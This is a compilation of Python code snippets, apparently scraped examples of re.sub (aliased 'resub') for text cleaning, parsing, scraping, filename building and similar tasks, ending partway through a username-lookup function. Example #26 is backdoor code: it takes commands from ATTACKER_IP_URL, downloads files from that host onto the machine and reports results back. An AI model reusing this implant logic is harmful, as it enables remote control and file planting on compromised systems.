Example #1
    def _parse(self, string):
        """
        Parses the given string and stores all information in the instance

        :param string: MTS config-like multi-line string containing the MO definition
        :type string: str|unicode
        """
        # Get MO tag. e.g. [SIM VFB]
        try:
            self._tag = match(r'\[(.+)\]\s*\n', string).group(1)
        except AttributeError:
            raise MtsSectionError("The given string to be parsed does not specify a correct tag for the section.")

        # Get body
        body = resub(r'\\\s*\n\s*', '', resub(r'.+\]\s*\n', '', string))
        sub = lambda value: resub(r'^"', '', resub(r'"$', '', value))

        # Get parameters from within the body
        params_list = split(r'\s*\n\s*', body)
        for param in params_list:
            # Skip empty lines
            if not match(r'\s*$', param):
                # print param
                var, values = match(r'^(.+?)=(.+)$', param).groups()

                # Split values into a list
                values_list = split(r',\s*', values)

                # Store the parameter
                self._add_param(var, [sub(i) for i in values_list])
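
A minimal, self-contained sketch of the input format these regexes imply (a [TAG] header line, key=value lines with comma-separated, optionally quoted values, and backslash-continued lines; MtsSectionError and _add_param belong to the surrounding class and are omitted):

    from re import match, split, sub as resub

    text = '[SIM VFB]\nname="vfb0", "vfb1"\nmode=1\n'
    tag = match(r'\[(.+)\]\s*\n', text).group(1)  # 'SIM VFB'
    body = resub(r'\\\s*\n\s*', '', resub(r'.+\]\s*\n', '', text))
    for param in split(r'\s*\n\s*', body):
        if not match(r'\s*$', param):
            var, values = match(r'^(.+?)=(.+)$', param).groups()
            vals = [resub(r'^"', '', resub(r'"$', '', v)) for v in split(r',\s*', values)]
            print(var, vals)  # name ['vfb0', 'vfb1'] / mode ['1']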
Example #2
    def fetch_url(queue, site, options):
        if options.output != "json":
            LOG.info("[Checking] " + get_fld(site["url"]))
        timeout = site["timeout"] if site["timeout"] != 0 else 10
        implicit = site["implicit"] if site["implicit"] != 0 else 5
        detections_count = 0
        source = get(site["url"].replace("{username}", req["body"]["string"]),
                     timeout=(implicit, timeout)).text
        text_only = "unavailable"
        title = "unavailable"
        temp_profile = {
            "found": 0,
            "link": "",
            "rate": "",
            "title": "",
            "text": ""
        }
        for detection in site["detections"]:
            temp_found = "false"
            if detection["type"] == "normal" and source != "" and detection[
                    "return"] == "true":
                detections_count += 1
                if detection["string"].replace(
                        "{username}",
                        req["body"]["string"]).lower() in source.lower():
                    temp_found = "true"
                if detection["return"] == temp_found:
                    temp_profile['found'] += 1

        if temp_profile["found"] > 0 and detections_count != 0:
            with ignore_excpetion():
                soup = BeautifulSoup(source, 'html.parser')
                [
                    tag.extract() for tag in soup(
                        ['head', 'title', 'style', 'script', '[document]'])
                ]
                temp_profile["text"] = soup.getText()
                temp_profile["text"] = resub("\s\s+", " ",
                                             temp_profile["text"])
                temp_profile["text"] = temp_profile["text"].replace(
                    "\n", "").replace("\t", "").replace("\r", "").strip()
            with ignore_excpetion():
                temp_profile["title"] = BeautifulSoup(
                    source, 'html.parser').title.string
                temp_profile["title"] = resub("\s\s+", " ",
                                              temp_profile["title"])
                temp_profile["title"] = temp_profile["title"].replace(
                    "\n", "").replace("\t", "").replace("\r", "").strip()
            if temp_profile["text"] == "":
                temp_profile["text"] = "unavailable"
            if temp_profile["title"] == "":
                temp_profile["title"] = "unavailable"
            temp_profile["rate"] = "%" + str(
                round(((temp_profile["found"] / detections_count) * 100), 2))
            temp_profile["link"] = site["url"].replace("{username}",
                                                       req["body"]["string"])
            copy_temp_profile = temp_profile.copy()
            queue.put([copy_temp_profile])
        else:
            queue.put(None)
Example #3
def IsValidTitle( txt,
                 expresion=r"[^a-zA-Z\s]|pdf|read|more|download|back|click"\
                 +"|pages?|view|continue|reading|format|opens?|window|new"\
                 +"|media|release|size|read|full|story"\
                 +"|january|february|march|april|may|june|july|august|september"\
                 +"|october|november|december|jan|feb|mar|apr|jun|jul"\
                 +"|aug|sep|oct|nov|dec"):
    txt = resub(expression, '', txt.lower())
    txt = resub(" +", ' ', txt)
    if len(txt.split()) < 2:
        return False
    return True
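
A quick sanity check of the filter: boilerplate link text loses all of its words to the pattern and is rejected, while an ordinary headline keeps two or more words:

    print(IsValidTitle("Download PDF"))               # False
    print(IsValidTitle("Senate passes budget bill"))  # True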
Example #4
def splice_convert(sequence, introns):
    from re import sub as resub
    # Remove each intron (treated as a literal pattern) from the sequence
    exon = sequence
    for intron in introns:
        exon = resub(intron, '', exon)
    # Transcribe DNA to RNA
    exon2 = resub('T', 'U', exon)
    # Translation starts at the first AUG codon (index 0 is a valid hit)
    start_ind = exon2.find('AUG')
    if start_ind >= 0:
        ex_out = exon2[start_ind:]
    else:
        ex_out = exon2
        print("didn't find start codon")
    return ex_out
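
A usage example in the spirit of the Rosalind RNA-splicing exercise this function appears to solve (introns are cut out literally, T is transcribed to U, and the output starts at the first AUG):

    print(splice_convert("ATGGTCTACATAGCT", ["GTCTAC"]))  # AUGAUAGCU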
Example #5
def write_new_ld_file(clusters, oldpath, newpath, threshold=1, **kwargs):
    '''
    clusters is created by get_new_segs above.
    oldpath and newpath are the locations of the old and new LearningData.txt files.
    threshold defaults to 1 (inseparability measure).
    Bigram clusters are sorted by their inseparability value; thus, if something
    that eventually becomes a trigram or tetragram has two-way parts in the current
    inseparability table, the bigram that is higher on the list is replaced first.
    '''
    clustlist = sorted([x for x in clusters if clusters[x] >= threshold],
                       key=clusters.get,
                       reverse=True)
    with open(oldpath, 'r', encoding='utf-8') as f:
        with open(newpath, 'w', encoding='utf-8') as out:
            for line in f:
                word = line.strip()
                if '\t' in line:
                    word = line.split('\t')[0]
                    rest = line.split('\t')[1:]
                for clust in clustlist:
                    x = r'(^|\s)' + (clust) + r'(\s|$)'
                    y = r'\1' + ''.join(clust.split(" ")) + r'\2'
                    word = resub(x, y, word)
                if '\t' in line:
                    out.write(word + '\t' + '\t'.join(rest))
                else:
                    out.write(word + '\n')
    msg.env_render(
        message=
        f"\n\nWrote modified learning data to {newpath.split('simulation')[1]}",
        **kwargs)
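
A minimal sketch of the replacement built in the loop above: a space-separated bigram is fused into one segment only where it occurs as whole segments of the word:

    from re import sub as resub

    clust = "t a"
    x = r'(^|\s)' + clust + r'(\s|$)'
    y = r'\1' + ''.join(clust.split(" ")) + r'\2'
    print(resub(x, y, "p a t a k a"))  # p a ta k a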
Example #6
    def __init__(self, name, test_definition):
        self.name = name
        test_definition = deep_merge(default_config, test_definition)
        # quick shortcuts
        self.test_env = test_definition['environment']
        self.test_meta = test_definition['meta']
        self.test_commands = test_definition.get('test_commands', [])
        # take care of commands ...
        self.test_commands = _build_exec_array(self.test_commands)
        self.test_meta['test_before'] = \
            _build_exec_array(self.test_meta.get('test_before', None))
        self.test_meta['test_after'] = \
            _build_exec_array(self.test_meta.get('test_after', None))

        # okay.
        # let's keep all file references relative to the configuration
        # file. easy to remember.
        configfilepath = realpath(dirname(self.test_meta.get('_configfile',
                                                             './dummy')))
        # self.TEMPLATE / .TEMPLATE_NAME
        tmp = self.test_meta['docker_compose_template']
        if not isabs(tmp):
            tmp = realpath(join(configfilepath, tmp))
        self.template = tmp
        self.template_name = basename(self.template)
        # self.BASEDIR
        tmp = self.test_meta.get('test_basedir', configfilepath)
        if not isabs(tmp):
            tmp = realpath(join(configfilepath, tmp))
        self.base_dir = tmp
        # self.SANITIZED_NAME, .TEST_DIR
        self.sanitized_name = resub("[^a-zA-Z0-9_]", "-", self.name)
        self.test_dir = dbg_tr_get_testdir(self.base_dir, self.sanitized_name)
        # extend SELF.TEST_ENV with TEST_DIR
        self.test_env['test_dir'] = self.test_dir
        # create SELF.COMMANDLINE
        self.commandline = copy.copy(default_commandline_start)
        for param in self.test_meta['docker_compose_params']:
            self.commandline.append(param)
        for key, val in self.test_env.items():
            self.commandline.append("-e")
            self.commandline.append("%s=%s" % (key, val))
        self.commandline.append("--rm")
        self.commandline.extend(copy.copy(default_commandline_end))
        self.commandline.append(self.test_meta['test_service'])
        # create .STATE, .RESULT, .EXCEPTION, .REASON
        self.state = self.NOTRUN
        self.results = []
        self.exception = None
        self.reason = None
        # log setup
        # NO LOGGING BEFORE HERE
        log_filename = join(self.base_dir, basename(self.test_dir)) + ".log"
        self.log = get_logger("t-%s" % self.name, filename=log_filename)
        # some debug output
        self.log.info("base commandline '%s'" % " ".join(self.commandline))
        self.log.debug("test directory '%s'" % self.test_dir)
        self.log.debug("template path '%s'" % self.template)
        for key, val in self.test_env.items():
            self.log.debug("env %s=%s" % (key, val))
Example #7
def simplify_string(text):
    """Simplify a string to remove special characters, double spaces and use lower case.

    Parameters
    ----------
    text: str
        string to clean

    Returns
    -------
    str

    Examples
    --------
    >>> text = ' (S . cerevisiáe  )'
    >>> simplify_string(text)
    's cerevisiae'

    """
    text = text.lower()
    text = ' '.join(text.split())
    text = unidecode(text)
    text = resub(r"[^a-zA-Z0-9]+", ' ', text)
    text = ' '.join(text.split())  # paranoia
    return text
Example #8
def cleanTags(string):
  """Remove all html tags from the string.

    >>> cleanTags("<html><head><title>Hello</title><body>Test</body></html>")
    'HelloTest'

  @type  string: string
  @param string: the string to clean
  @rtype: string
  @return: the cleaned up string
  """
  # http://lxml.de/api/lxml.html.clean.Cleaner-class.html
  htmlCleaned = Cleaner(allow_tags=[''], remove_unknown_tags=False, style=True
      ).clean_html(string or u"dummy")
  nice = htmlCleaned[5:-6] if htmlCleaned.startswith("<div>") else htmlCleaned
  return resub(r"\s\s+" , " ", resub(r"\s\s+" , " ", nice)).strip()
Example #9
 def __init__(self,
              name,
              compose_file,
              **kwargs):
     self.name = "{}".format(name if name else basename(compose_file))
     self.sanitized_name = "intmaniac{}".format(
         resub("[^a-z0-9]", "",
               self.name.lower() + basename(compose_file).lower())
     )
     self.template = compose_file
     self.compose_wrapper = Compose(compose_file, self.sanitized_name,
                                    run_kwargs={'throw': True})
     # extract "top level" parameters
     self.test_env = kwargs.pop('environment', {})
     self.test_image = kwargs.pop('image')
     self.test_linked_services = kwargs.pop('links')
     self.test_commands = _build_exec_array(kwargs.pop('commands', []))
     # save the rest
     self.meta = kwargs
     # state information
     self.test_state = self.NOTRUN
     self.test_results = []
     self.exception = None
     self.reason = None
     # run information - this can only be set after the env is running
     self.cleanup_test_containers = []
     self.run_containers = None
     # log setup
     self.log = get_logger("t-%s" % self.name)
     # some debug output
     self.log.debug("using template '%s'" % self.template)
     for key, val in self.test_env.items():
         self.log.debug("env %s=%s" % (key, val))
Example #10
def index():
    if request.method == 'POST':
        # Create board details
        boardName = resub(r'[^-\w ]', '', request.form['boardName'])
        singleTokenBoardName = boardName.lower().replace(' ', '-')
        boardId = hashlib.sha1((boardName + str(datetime.now())).encode()).hexdigest()

        # Add board to database
        mongo.db.boards.insert_one({
            'boardId': boardId,
            'boardName': boardName,
            'singleTokenBoardName': singleTokenBoardName,
            'maxNid': 0,
            'notes': {}
        })

        # # Send email to creator
        # send_email(request.form['email'],
        #               'Link for the scrumboard %s' % boardName,
        #               creator_message % (boardName, singleTokenBoardName, boardId))

        # Redirect user to their new board
        return redirect('/%s/%s' % (singleTokenBoardName, boardId))

    # Render start page on GET
    return render_template('start.j2')
Example #11
def sniff_dims(x):
    pattern = r"\#+dims\="
    if rematch(pattern, x):
        y = resub(pattern, "", x)
        dims = list(map(int, y.split(",")))
        return dims
    else:
        return None
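
Assuming rematch and resub are the usual aliases for re.match and re.sub, the function reads a #dims= header line and returns None for anything else:

    print(sniff_dims("##dims=3,4,5"))  # [3, 4, 5]
    print(sniff_dims("3,4,5"))         # None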
Example #12
def FindPublishDate(dstr):
    for line in dstr[:300].splitlines():
        line = resub(r'\W+', ' ', line).strip()
        pdate = ParseDateStr(line)
        if pdate:
            return pdate

    return ''
Example #13
def create_replies_with_emojies(id, url):
    replies = list()
    try:
        uclient = ureq(url)
        tweet_html = uclient.read()
        uclient.close()
        tweet_soup = soup(tweet_html, 'html.parser')
        containers = tweet_soup.find_all('div',
                                         {'class': 'js-tweet-text-container'})
        record = False
        for container in containers:
            if record:
                reply = container.p.text.strip()
                reply = reply.replace('\n', ' ')
                reply = reply.replace('\r', '')
                reply = resub(r'https?:\/\/[a-zA-Z0-9@:%._\+~#=\/]*[ ]*', ' ',
                              reply)
                emojis_used = ''
                if not reply.strip():
                    continue
                emojis = container.find_all('img',
                                            {'class': 'Emoji Emoji--forText'})
                for emoji in emojis:
                    # reply+="<"+emoji['title']+"-"+emoji['alt']+">"
                    emojis_used += " " + emoji['alt']
                footer = container.parent.find_all(
                    'div', {'class': 'stream-item-footer'})[0]
                retweet_count = \
                    footer.find_all('div', {'class': 'ProfileTweet-action--retweet'})[0].find_all('span', {
                        'class': 'ProfileTweet-actionCountForPresentation'})[0].text.strip()
                liked_count = \
                    footer.find_all('div', {'class': 'ProfileTweet-action--favorite'})[0].find_all('span', {
                        'class': 'ProfileTweet-actionCountForPresentation'})[0].text.strip()
                # print(reply, retweet_count, liked_count)
                if not retweet_count:
                    retweet_count = 0
                if not liked_count:
                    liked_count = 0
                reply = reply.replace(',', ' ')
                reply_data = [
                    str(id),
                    str(reply), emojis_used,
                    str(retweet_count),
                    str(liked_count)
                ]
                # print(reply_data)
                replies.append(reply_data)
                record = True
    except:
        t1, v1, trace = exc_info()
        print(t1)
        print(v1)
        print(trace)
        print('error occured with: ', url)
        replies.clear()
    return replies
Example #14
def 英文字母_句子():
	global 结果串
	读文件到列表(数据文件名)
	for 句子 in 数据列:
		s = resub(r'[^\w]', '', 句子)  # replace with empty string
		s = "--".join([i for i in s])
		结果串 = 结果串 + s + '\n'
	将数据写入文件(结果串, 结果文件名)
	return True
Example #15
def 英文文本():
	global 结果串
	读文件到列表(数据文件名)
	for 句子 in 数据列:
		s = resub(r'[^\w\s]', ' ', 句子)  # replace with a space
		s = "--".join(s.split())
		结果串 = 结果串 + s + '\n'
	将数据写入文件(结果串, 结果文件名)
	return True
Example #16
    def _write_system(self, system, inputf='input', config=None):
        from re import sub as resub
        if not config:
            config = self._config
        dirname = self._dirname
        filename = dirname + '/' + inputf

        polynomials = [p.factor() for p in system.polynomials]
        variables = system.variables
        parameters = system.parameters
        homvar = system.homvar
        num_polys = system.shape[0]

        options = config.keys()

        str_poly = [str(p) for p in polynomials]
        str_poly = [
            resub(string=p, pattern=r'\*\*', repl='^') for p in str_poly
        ]
        str_vars = [str(v) for v in variables]
        str_pars = [str(p) for p in parameters]

        poly_names = ['f{0}'.format(i + 1) for i in range(num_polys)]
        polys_named = zip(poly_names, str_poly)

        poly_list = ','.join(poly_names)
        vars_list = ','.join(str_vars)
        pars_list = ','.join(str_pars)

        fh = open(filename, 'w')

        # write the CONFIG section
        print('CONFIG', file=fh)
        for option in options:
            print('{0}:{1};'.format(option, config[option]), file=fh)
        print('END', file=fh)

        # write the INPUT section
        print('INPUT', file=fh)
        if parameters:
            print('parameter {0};'.format(pars_list), file=fh)
        if homvar:
            print('hom_variable_group {0};'.format(vars_list), file=fh)
        else:
            print('variable_group {0};'.format(vars_list), file=fh)
        print('function {0};'.format(poly_list), file=fh)

        for p in polys_named:
            # p is a key-value pair, e.g., ('f1', 'x^2 - 1')
            print('{0} = {1};'.format(p[0], p[1]), file=fh)
        print('END', file=fh)

        # finish up
        fh.close()

        return filename
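
For a one-polynomial system f1 = x^2 - 1 in a single variable x (no parameters, no homogeneous variable group) and an assumed config of {'TRACKTYPE': 0}, the file written above would look like:

    CONFIG
    TRACKTYPE:0;
    END
    INPUT
    variable_group x;
    function f1;
    f1 = x^2 - 1;
    END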
Example #17
def 英文字母_单词():
	global 结果串
	读文件到列表(数据文件名)
	for 句子 in 数据列:
		s = resub(r'[^\w\s]', ' ', 句子)
		for i in s.split():
			tmp = "--".join([x for x in i])
			结果串 = 结果串 + tmp + '\n'
	将数据写入文件(结果串, 结果文件名)
	return True
Example #18
 def filter_file(self, connexion, mo):
     # extract the position of the matching pattern, then extract the
     # conversion string from the file conversion sequence
     groupdict = mo.groupdict()
     for group in groupdict:
         filename = groupdict[group]
         if not filename:
             continue
         filepattern = self.filepatterns[group]
         return resub(r'\{(\w+)\}', connexion._dynreplace, filepattern)
     raise TftpError(TftpError.NOT_DEF,
                     'Internal error, file matching pattern issue')
Example #19
def replacing(what_to_replace: str, for_what: str, full_string: str) -> str:
    try:
        upper_list = [
            True if letter.isupper() else False for letter in refindall(
                what_to_replace, full_string, flags=reIGNORECASE)[0]
        ]
    except IndexError:
        return "False"
    if all(upper_list):
        return resub(what_to_replace,
                     for_what.upper(),
                     full_string,
                     flags=reIGNORECASE)

    replaced_word = ''.join(letter.upper() if is_upper else letter.lower()
                            for letter, is_upper in zip_longest(
                                for_what, upper_list, fillvalue=False))

    return resub(what_to_replace,
                 replaced_word,
                 full_string,
                 flags=reIGNORECASE)
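
A brief usage sketch of the case-mirroring behaviour (refindall, reIGNORECASE, resub and zip_longest are assumed to be the usual aliases for re.findall, re.IGNORECASE, re.sub and itertools.zip_longest):

    print(replacing("cat", "dog", "My CAT is here"))  # My DOG is here
    print(replacing("cat", "dog", "My Cat is here"))  # My Dog is here
    print(replacing("cat", "dog", "No match here"))   # 'False' (no match found)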
Example #20
    def startscrapping(self,id,url):
        self.replies_found = False
        with open(self.replies_title,"a",encoding="utf-8") as replies:
            try:
                uclient = ureq(url)
                tweet_html = uclient.read()
                uclient.close()
                tweet_soup = soup(tweet_html,'html.parser')
                containers = tweet_soup.find_all('div', {'class': 'js-tweet-text-container'})
                if len(containers) > 1:
                    record = False
                    for container in containers:
                        if record:
                            reply = container.p.text.strip()
                            reply = reply.replace('\n',' ')
                            reply = reply.replace('\r','')
                            reply = resub(r'https?:\/\/[a-zA-Z0-9@:%._\+~#=\/]*[ ]*',' ',reply)
                            if not reply.strip():
                                continue
                            emoji_used = ''
                            emojis = container.find_all('img',{'class':'Emoji Emoji--forText'})
                            for emoji in emojis:
                                # reply+="<"+emoji['title']+"-"+emoji['alt']+">"
                                emoji_used += emoji['alt'] + ' '
                            footer = container.parent.find_all('div', {'class': 'stream-item-footer'})[0]
                            retweet_count = footer.find_all('div', {'class': 'ProfileTweet-action--retweet'})[0].find_all('span', {
                                'class': 'ProfileTweet-actionCountForPresentation'})[0].text.strip()
                            liked_count = footer.find_all('div', {'class': 'ProfileTweet-action--favorite'})[0].find_all('span', {
                                'class': 'ProfileTweet-actionCountForPresentation'})[0].text.strip()
                            # print(reply, retweet_count, liked_count)
                            if not retweet_count:
                                retweet_count = 0
                            if not liked_count:
                                liked_count = 0
                            reply = reply.replace(',',' ')
                            reply_data = str(id) + ',' + str(reply) +','+ emoji_used+ ',' + str(retweet_count) + ',' + str(liked_count) + '\n'
                            # print(reply_data)
                            replies.write(reply_data)
                            self.replies_found = True
                        record = True
            except:
                # t1, v1, trace = exc_info()
                # print(t1)
                # print(v1)
                # print(trace)
                print('error occured with: ',url)
                self.replies_found = False

# scrap = Scrapper('https://t.co/36UkqQikKc','932115407783174145')
# scrap.startscrapping()
Example #21
def gen_filename(collection_name, format_part, date_string, extension):
    """
    Creates a filename based on various properties of a Poll Request and Content Block

    :param collection_name: The collection name
    :param format_part: The format part (e.g., '_STIX_10_')
    :param date_string: A datestring
    :param extension: The file extension to use
    :return: A string containing the generated filename
    """

    filename = (
        collection_name.lstrip(".") + format_part + resub(r"[^a-zA-Z0-9]", "_", date_string) + extension
    ).translate(None, '/\\:*?"<>|')
    return filename
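
Note that str.translate(None, chars) is the Python 2 deletion API, so this snippet targets Python 2; under Python 3 the character-stripping step would read roughly:

    filename = filename.translate(str.maketrans('', '', '/\\:*?"<>|'))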
Example #22
def gen_filename(collection_name, format_part, date_string, extension):
    """
    Creates a filename based on various properties of a Poll Request and Content Block

    :param collection_name: The collection name
    :param format_part: The format part (e.g., '_STIX_10_')
    :param date_string: A datestring
    :param extension: The file extension to use
    :return: A string containing the generated filename
    """

    filename = (collection_name.lstrip(".") + format_part +
                resub(r"[^a-zA-Z0-9]", "_", date_string) +
                extension).translate(None, '/\\:*?"<>|')
    return filename
Example #23
def clean_data(my_string):
    '''
    clean_data cleans the my_string argument. It removes non-printable
    characters and specific CSV characters, and strips leading and trailing
    spaces. It also removes SPLITTER, a specific string used for objects
    and relations.
    '''

    rexes = ['^ *', ' *$', SPLITTER]
    char_to_remove = ["'", '"', ',']
    clean_s = ''
    for char in my_string:
        if char in printable and char not in char_to_remove:
            clean_s += char
    for regex in rexes:
        clean_s = resub(regex, '', clean_s)
    return clean_s
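
Assuming printable comes from the string module and SPLITTER is a module-level constant, a quick usage sketch:

    print(clean_data('  "hello", world  '))  # hello world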
Example #24
def ParseDateStr(dstr):
    if len(dstr) == 0:
        return ''
    dstr = ' ' + dstr.lower() + ' '
    dstr = resub(r'[\W\d](th|st|nd|rd)\W', '', dstr).strip()

    try:
        dobjs = extract_dates(dstr, return_precision=True, debug=False)
        for o in dobjs:
            if o[1] == 'day':
                dobj = o[0].replace(tzinfo=None)
                if dobj <= cdate:
                    return dobj
    except:
        return ''

    return ''
Example #25
def get_files_prefixes(fs_path="./input", suffix=".csv$"):
    '''
    get_files_prefixes will search in the path and returns all files that
    contains objects and relations for the graph
    '''

    files_prefix = {}
    for _, _, files in walk(fs_path):
        for name in files:
            base_name = resub(suffix, '', name)
            name_parts = base_name.split(SPLITTER)

            if name_parts[0] in (OBJECT_FILE_PREFIX, RELATIONS_FILE_PREFIX):
                if name_parts[0] not in files_prefix:
                    files_prefix[name_parts[0]] = set()
                files_prefix[name_parts[0]].add(name)
    return files_prefix
Example #26
def UploadFile(command):
    upload = ""
    fileContentPath = ""
    try:
        upload, fileContentPath = command.split('::')
    except Exception as e:
        httpReq(ATTACKER_IP_URL,
                data="file=" +
                quote_plus('\n  [ERROR] Invalid command syntax.\n'))
        return

    try:
        fileBytes = httpReq(ATTACKER_IP_URL + '/uploadRequest',
                            data='file=' +
                            quote_plus(fileContentPath.replace('"', '')),
                            returnBytes=True)
        fName = httpReq(ATTACKER_IP_URL + '/uploadRequestFileName',
                        data='file=' +
                        quote_plus(fileContentPath.replace('"', ''))).encode()

        altchars = b'+/'
        fName = resub(rb'[^a-zA-Z0-9%s]+' % altchars, b'', fName)
        missing_padding = len(fName) % 4
        if missing_padding:
            fName += b'=' * (4 - missing_padding)

        fName = b64decode(fName, altchars)
        fName = fName.decode()

        try:
            with open(fName, 'wb') as f:
                f.write(fileBytes)
            httpReq(ATTACKER_IP_URL,
                    data="file=" +
                    quote_plus('\n  [INFO] Upload successful.\n'))
        except Exception as e:
            httpReq(
                ATTACKER_IP_URL,
                data="file=" + quote_plus(
                    '\n  [ERROR] An error occurred when trying to upload.\n'))
            pass

    except Exception as e:
        httpReq(ATTACKER_IP_URL, data="file=" + quote_plus(str(e.args)))
Example #27
def do_comment(request, dailyphoto_id):
    dp_obj = get_object_or_404(DailyPhoto, id=dailyphoto_id)

    comment = request.POST.get('do_comment', '')
    comment = comment.strip()
    # Save the comment in DB.
    print "Comment Text: ", comment
    list_of_users_in_comment = [resub(r'\[|\]', r'', name)
                                for name in findall(r'\[[a-z0-9]+\]', comment)]
    for nuser in list_of_users_in_comment:
        print nuser
    if comment:
        Comments.objects.create(user=request.user,
                                dailyphoto=get_object_or_404(DailyPhoto, id=dailyphoto_id),
                                comment=comment,
                                )
        redis_obj = StrictRedis(db=9)
        redis_obj.publish("notifications:%s" % request.user.username, 1)
    return HttpResponseRedirect(
        reverse('users.views.browse_daily_photo_single', args=(str(dp_obj.user.username), dp_obj.key)))
Example #28
    def handle_response(self, response, args):
        super(PollClient11Script, self).handle_response(response, args)

        if response.message_type == tm11.MSG_POLL_RESPONSE:
            if response.more:
                print "This response has More=True, to request additional parts, use the following command:"
                print "  fulfillment_client --collection %s --result-id %s --result-part-number %s\r\n" % \
                    (response.collection_name, response.result_id, response.result_part_number + 1)
            for cb in response.content_blocks:
                if cb.content_binding.binding_id == t.CB_STIX_XML_10:
                    format = '_STIX10_'
                    ext = '.xml'
                elif cb.content_binding.binding_id == t.CB_STIX_XML_101:
                    format = '_STIX101_'
                    ext = '.xml'
                elif cb.content_binding.binding_id == t.CB_STIX_XML_11:
                    format = '_STIX11_'
                    ext = '.xml'
                elif cb.content_binding.binding_id == t.CB_STIX_XML_111:
                    format = '_STIX111_'
                    ext = '.xml'
                else:  # Format and extension are unknown
                    format = ''
                    ext = ''

                if cb.timestamp_label:
                    date_string = 't' + cb.timestamp_label.isoformat()
                else:
                    date_string = 's' + datetime.datetime.now().isoformat()

                filename = (    response.collection_name.lstrip(".") +
                                format +
                                resub(r"[^a-zA-Z0-9]", "_", date_string) + ext
                                ).translate(None, '/\\:*?"<>|')
                filename = os.path.join(args.dest_dir, filename)

                f = open(filename, 'w')
                f.write(cb.content)
                f.flush()
                f.close()
                print "Wrote Content Block to %s" % filename
Example #29
def image_resize(image_path, new_size, maintain_ratio=False):
    save_dir = path.dirname(image_path)
    new_filename = '%s_%s' % (path.basename(image_path), new_size)
    resize_command = ['convert', "%s" % image_path]
    if not maintain_ratio:
        comm_args = '-resize "%s^" -gravity center  -extent %s "%s/%s"' \
                    % (new_size, new_size, save_dir, new_filename)
    else:
        image_size = check_output(['identify', "%s" % image_path])
        image_size = resub(r'.* ([0-9]+x[0-9]+) .*\n', r'\1', image_size)
        old_x, old_y = image_size.split('x')
        new_x, new_y = new_size.split('x')
        new_y = int((float(old_y) / float(old_x)) * float(new_x))
        new_size = "%sx%d" % (new_x, new_y)
        new_filename = '%s_%s' % (path.basename(image_path), new_x)

        comm_args = '-resize %s^ -gravity center  -extent %s "%s/%s"' \
                    % (new_size, new_size, save_dir, new_filename)

    resize_command.extend(shlex_split(comm_args))
    call(resize_command)
Example #30
 def build_mac_acl(cls, entry: str) -> Tuple[int, int]:
     parts = entry.split('/', 1)
     values = []
     bitcount = cls.ACCESS_LOCAL['mac']
     maxval = (1 << bitcount) - 1
     for mask, part in enumerate(parts):
         try:
             if mask:
                 value = maxval & ~((1 << int(part)) - 1)
             else:
                 part = resub('[-:]', '', part)
                 value = int(part, 16)
                 value <<= bitcount - len(part) * 4
             if not 0 <= value <= maxval:
                 raise ValueError()
             values.append(value)
         except Exception:
             raise ValueError('Invalid ACL value: %s' % entry)
     if len(values) < 2:
         values.append(maxval)
     return tuple(values)
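
A standalone reproduction of the arithmetic for one entry, assuming cls.ACCESS_LOCAL['mac'] is 48 (the bit length of a MAC address), so 'aa:bb:cc/24' yields a left-aligned value and a 24-bit prefix mask:

    from re import sub as resub

    bitcount = 48                          # assumed ACCESS_LOCAL['mac']
    maxval = (1 << bitcount) - 1
    part = resub('[-:]', '', 'aa:bb:cc')   # address half of 'aa:bb:cc/24'
    value = int(part, 16) << (bitcount - len(part) * 4)
    mask = maxval & ~((1 << 24) - 1)       # prefix half: 24 mask bits
    print(hex(value), hex(mask))           # 0xaabbcc000000 0xffffff000000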
Example #31
    def _clean_text(self, text_series):
        """
        Cleans a column of text. Removes all special characters, 
        websites, mentions etc.
        
        Parameters
        ----------

        text_series: Pandas.Series
        
        Returns
        -------
        
        Pandas.Series
            Cleaned text
        """
        from re import sub as resub
        text_series = text_series.apply(
            lambda x: resub(r"[^A-Za-z0-9 ]+|(\w+:\/\/\S+)|htt", " ", x
                            )).str.strip().str.lower()
        return text_series
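
A hedged usage sketch of the same transformation outside the class (assuming pandas is installed; exact spacing of the output depends on the input):

    from re import sub as resub
    import pandas as pd

    s = pd.Series(["Visit https://example.com NOW!", "Hello_World"])
    cleaned = s.apply(lambda x: resub(r"[^A-Za-z0-9 ]+|(\w+:\/\/\S+)|htt", " ",
                                      x)).str.strip().str.lower()
    print(cleaned.tolist())  # ['visit   now', 'hello world']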
Example #32
 def __init__(self,
              name,
              compose_file,
              **kwargs):
     self.name = "{}".format(name if name else basename(compose_file))
     self.sanitized_name = "intmaniac{}".format(
         resub("[^a-z0-9]", "",
               self.name.lower() + basename(compose_file).lower())
     )
     self.template = compose_file
     self.compose_wrapper = Compose(compose_file, self.sanitized_name,
                                    run_kwargs={'throw': True})
     # extract "top level" parameters
     self.test_env = kwargs.pop('environment', {})
     self.test_image = kwargs.pop('image')
     self.test_linked_services = kwargs.pop('links')
     self.test_commands = _build_exec_array(kwargs.pop('commands', []))
     # meta_information
     self.pull = kwargs.pop('pull', True)
     self.pre = kwargs.pop('pre', None)
     self.post = kwargs.pop('post', None)
     self.allow_failure = kwargs.pop('allow_failure', False)
     self.volumes = self.format_volume_mapping(kwargs.pop('volumes', []))
     # save the rest (run-arguments for docker.container.create())
     self.meta = kwargs
     # state information
     self.test_state = self.NOTRUN
     self.test_results = []
     self.exception = None
     self.reason = None
     # run information - this can only be set after the env is running
     self.cleanup_test_containers = []
     self.run_containers = None
     # log setup
     self.log = get_logger("t-%s" % self.name)
     # some debug output
     self.log.debug("using template '%s'" % self.template)
     for key, val in self.test_env.items():
         self.log.debug("env %s=%s" % (key, val))
Example #33
def do_comment(request, dailyphoto_id):
    dp_obj = get_object_or_404(DailyPhoto, id=dailyphoto_id)

    comment = request.POST.get('do_comment', '')
    comment = comment.strip()
    # Save the comment in DB.
    print "Comment Text: ", comment
    list_of_users_in_comment = [
        resub(r'\[|\]', r'', name)
        for name in findall(r'\[[a-z0-9]+\]', comment)
    ]
    for nuser in list_of_users_in_comment:
        print nuser
    if comment:
        Comments.objects.create(
            user=request.user,
            dailyphoto=get_object_or_404(DailyPhoto, id=dailyphoto_id),
            comment=comment,
        )
        redis_obj = StrictRedis(db=9)
        redis_obj.publish("notifications:%s" % request.user.username, 1)
    return HttpResponseRedirect(
        reverse('users.views.browse_daily_photo_single',
                args=(str(dp_obj.user.username), dp_obj.key)))
Example #34
    def fetch_url(site, username, options):
        LOG.info("[Checking] " + get_fld(site["url"]))
        timeout = site["timeout"] if site["timeout"] != 0 else 10
        implicit = site["implicit"] if site["implicit"] != 0 else 5
        detections_count = 0
        source = ""
        with suppress(Exception):
            source = get(site["url"].replace("{username}", username),
                         timeout=(implicit, timeout)).text
        text_only = "unavailable"
        title = "unavailable"

        detection_level = {
            "extreme": {
                "fast": "normal",
